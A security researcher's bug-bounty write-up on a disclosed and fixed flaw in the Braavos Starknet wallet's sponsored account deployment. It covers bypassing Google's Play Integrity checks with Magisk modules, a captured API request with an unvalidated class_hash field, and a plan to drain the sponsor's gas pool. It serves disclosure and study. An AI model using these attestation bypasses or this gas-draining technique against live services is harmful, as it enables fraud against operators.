I’ve always been fascinated by ZK-related technology, which led me to explore ZK-based chains like Starknet. I found its Account Abstraction (AA) model and wallet architecture particularly interesting. The effect of Starknet’s AA is that for a user to have an account on-chain, they must first deploy an account contract.

This is somewhat counter-intuitive. To deploy a new account, you seemingly need an existing account with gas (previously ETH, now STRK) to fund this yet-to-be-created account. Tracing this back, it feels like a classic “chicken-and-egg” problem. For new users, this means they have to acquire STRK from an external source, perhaps a bridge, and send it to their new address just to complete the deployment. This adds a significant layer of friction to the onboarding process.

To provide a friendlier solution to this frustrating onboarding hurdle, the mainstream Starknet wallet, Braavos, came up with a clever solution: a built-in “Gasless” feature. The moment you finish creating a wallet in their mobile app—right after backing up your seed phrase—the app automatically deploys your account on-chain for you, covering the gas fee itself.

This magical, sponsored deployment process immediately caught my attention. Unlike the more formal Paymaster concept, this feature felt more like a pure “Gas Funder.” My security intuition immediately flagged two potential areas worth digging into:

  1. Is there any rate-limiting? If not, could I write a script to trigger this feature repeatedly, creating a massive number of accounts and draining their gas pool?
  2. How do they validate the transaction I submit? The Braavos backend uses its own funds to execute a transaction with parameters I provide. If their validation wasn’t strict, could I submit any transaction—say, a token transfer—and have them unknowingly sign and execute it, effectively siphoning funds from their sponsor account?

Bypassing the Play Integrity API

My first step was to intercept the network traffic to understand the mechanics of this sponsored transaction. But I hit a wall almost immediately.

I discovered that on an Android device, if you set up an environment capable of intercepting traffic—for instance, by rooting the device with Magisk to use Frida for SSL Pinning removal—the Braavos app would refuse to send the account deployment request. On the same phone in a “clean,” non-interceptable environment, it worked perfectly.

At first, I assumed the app had its own root detection. I tried to find related code snippets, but reversing its React Native codebase proved to be a hassle. I found a few suspicious-looking areas, but nothing definitive. After a process of elimination, I discovered the trigger was more fundamental: the app wouldn’t send the request if the phone’s bootloader was unlocked. Even simply enabling the “Allow OEM Unlock” option in the developer settings was enough to block it.

This didn’t feel like a typical in-app root check. It had to be a more systematic, robust verification. I asked GPT to brainstorm some possible detection mechanisms, and after manually hooking a few, I got a hit on com.google.android.play.core.integrity. That’s when I realized the root cause was something I had heard of but never battled directly: the Play Integrity API.

Simply put, this is an official Google service that allows an app to determine if the device’s environment is “secure.” When called, the API returns a token after sending device environment data and a signed attestation to a remote server for verification. It suddenly reminded me of how Magisk’s creator, John Wu, used to complain on Twitter about SafetyNet (the predecessor to Play Integrity). A small update from Google could render months of bypass efforts obsolete—a constant cat-and-mouse game. Nevertheless, the XDA community always seems to find a way.

Since the Play Integrity API was the blocker, my primary objective shifted: How can I, in a rooted environment, fool the Play Integrity API’s checks?

Of course, if we had EL3-level permissions on our test device, bypassing this would be trivial—a classic dimensional-strike where we could modify the user-space from a higher privilege level without touching anything from EL1 downwards. But that would require rewriting a lot of components, so I stuck to finding a more universal solution.

This is a persistent pain for Android root enthusiasts, so bypass methods are constantly evolving. Currently, on a test device downgraded to Android 12, a combination of two Magisk modules can successfully bypass Play Integrity:

  • Play Integrity Fix (PIF): This module spoofs the device’s properties. When the API checks the device status (like the bootloader lock), PIF intercepts the call and returns the profile of a “clean” device.
  • TrickyStore: A critical part of the check involves signing data with a private key in the hardware-backed Keystore. This type of module hooks higher-level API calls, allowing a custom certificate chain to satisfy the validation.

After tinkering with these two modules, I successfully captured the key request sent by the Braavos wallet.

The Controllable class_hash

With the traffic captured, the full request came into view. The deployment happens in two stages: first a call to a /simulate endpoint, followed by a call to /execute to finalize it on-chain.

POST /prod/gasless/tx/simulate HTTP/2
Host: geqr5qrwjh.execute-api.us-east-1.amazonaws.com
X-Firebase-Appcheck: <REDACTED_EXAMPLE_TOKEN>
Content-Type: text/plain;charset=UTF-8
...

{
    "network": "mainnet-alpha",
    "calls": [
        {
            "contractAddress": "0x03d94f65ebc7552eb517ddb374250a9525b605f25f4e41ded6e7d7381ff1c2e8",
            "entrypoint": "deploy_braavos_account",
            "calldata": [
                "0x4ee6df0656972b4e096902b735f02f706a7c2142f9547b2b81a39074d23ce41",
                "13",
                "0x03957f9f5a1cbfe918cedc2015c85200ca51a5f7506ecb6de98a5207b759bf8a", // account_class_hash
                "0x0", "0", "0", "0", "0", "0x0", "0x0", "0x0", "0x0",
                "0x534e5f4d41494e",
                "3233904491969167010184796238085025547722936772405769931232663921476088886149",
                "2165938814148688931756724393060713462260373918073253056937201152616284205373"
            ]
        }
    ],
    "account": "0x2e3e9a4a70bca7a997cb65fe30d9c04f49d6d69d3067d69516f9e98f9261ad1",
    "walletVersion": "4.9.2",
    "deviceType": "mobile"
}

The X-Firebase-Appcheck token in the header, obtained via the Play Integrity API, was valid for about an hour. During this window, I could call the simulate and execute endpoints freely. This meant my first hypothesis about rate-limiting was essentially correct.

I tried modifying the contractAddress and entrypoint in the calldata, but the backend validated them. This disproved my second hypothesis—I couldn’t make it execute an arbitrary transfer.

However, as I continued inspecting the calldata, I noticed that one parameter I’ve commented as account_class_hash seemed to have no backend validation. I could change it to any value I wanted.

So, what is a class_hash? Simply put, on Starknet you first have a class, and then you have a contract, which is an instance of a class. This class_hash defines the underlying code logic for the AA contract you are about to deploy. The correct value, of course, should be the official Braavos account’s class_hash.

Under normal circumstances, being able to change the class_hash for your own account is a feature of AA, allowing for different types of account implementations. But now, someone else (Braavos) was paying for the deployment, and I could control the class_hash. This is where the problem lay.

By analyzing the source code of Braavos’s account factory and base account contracts, I saw the call chain was deploy_braavos_account -> initializer_from_factory.

Inside the base account’s initialization logic, the code does the following:

// Read account_chash directly from the input parameters
let account_chash = (*deployment_params.at(0)).try_into().unwrap();
// Replace the current contract's implementation with this class_hash
replace_class_syscall(account_chash).unwrap_syscall();

// Then, call the initializer function of the new class_hash
let mut depl_cdata = array![stark_pub_key.pub_key];
depl_cdata.append_span(deployment_params);
library_call_syscall(
    class_hash: account_chash,
    function_selector: Consts::INITIALIZER_FROM_FACTORY_SELECTOR,
    calldata: depl_cdata.span(),
).unwrap_syscall();

The account_chash is taken directly from deployment_params, which is the array we pass in via calldata! Because the Braavos backend didn’t validate this value, an attacker could provide the class_hash of their own malicious code.

The library_call_syscall is similar to the EVM’s delegatecall, and the initializer_from_factory function of this attacker-provided class_hash could contain any logic. When the Braavos backend received this manipulated request, it would instruct its sponsor account to submit the transaction. The result: the sponsor account would pay the gas fee to execute arbitrary code that I wrote.

Of course, by this point in the execution, the caller context had shifted to the factory contract, so I couldn’t use this identity to transfer funds from the sponsor account. Therefore, the vulnerability ultimately manifested as a “Gas Burning” attack—the ability to execute arbitrary code, with the most direct harm being the depletion of the sponsor’s gas funds.

Impact Analysis: The Sponsor Pool

So, how much gas was there for me to burn? I went on-chain to investigate.

I found that Braavos used at least three concurrent sponsor accounts to process these requests (I’m guessing their backend runs at least three parallel workers for this):

  • 0x05e8fc9916168dca043f825b4024170826e529c56a81b9c7bdc7a6272c1d7a44
  • 0x07be43131dccfdd41ea1b06f3e13026e827653932de281675daea6c6f905b5bd
  • 0x0761a5d53b8133d70140845fbc522f63adf80f3b9ed979d2eb7f772f76c1b206

The STRK balance in these accounts was kept relatively low, typically under 1,000 STRK each.

But the real prize lay behind them. These three accounts were topped up on-demand by a single, central “replenishment account”:

  • 0x040e32e176dca8f7fba4fab267763172d4530add0719b62ad77d96a2903030ad

This main account held approximately $51,000 USD worth of various tokens (ETH, USDC, etc.). It would periodically swap these assets into STRK to “pay” the three frontline accounts.

With this information, the full potential impact became clear:

  1. By crafting transactions with high computational costs, an attacker could rapidly drain all the STRK from the three sponsor accounts.
  2. Due to the replenishment mechanism, the attack could run 24/7. As long as the main treasury had funds, it would become a perpetual money drain, slowly siphoning off the entire $51k pool.
  3. Once the gas was depleted, the Gasless mechanism would fail for all legitimate new users, paralyzing the Braavos onboarding process.

Epilogue: The Severity Rating

I immediately submitted this vulnerability report to Braavos through their bug bounty program (https://braavos.app/braavos-wallet-bug-bounty-program/). They promptly confirmed and fixed the issue. However, a difference of opinion arose when it came to the severity rating.

In my assessment, a vulnerability that can cause direct, persistent financial loss and lead to the failure of a core platform feature (new user onboarding) should be classified as High severity.

But the Braavos team ultimately rated it as Low. Their reasoning was that it did not affect user funds, only an “optional UX feature” belonging to Braavos itself. They also noted that the sponsor accounts were intentionally kept at a low balance, making the financial loss manageable.

I don’t entirely agree with this assessment. An attacker exploiting this would be very stealthy. From the Braavos team’s perspective, they might only see an unusually high gas consumption rate at most, leading them to passively keep refilling the pool while the losses mount. While I couldn’t transfer their funds directly, I could use their gas to perform my own computationally intensive tasks or for other on-chain arbitrage opportunities. Is that not a direct financial loss?

Perhaps because “Gas Burning” vulnerabilities are less common, there are fewer community precedents for rating them. When it comes to defining their severity, it seems it’s always the submitter who’s in the awkward position.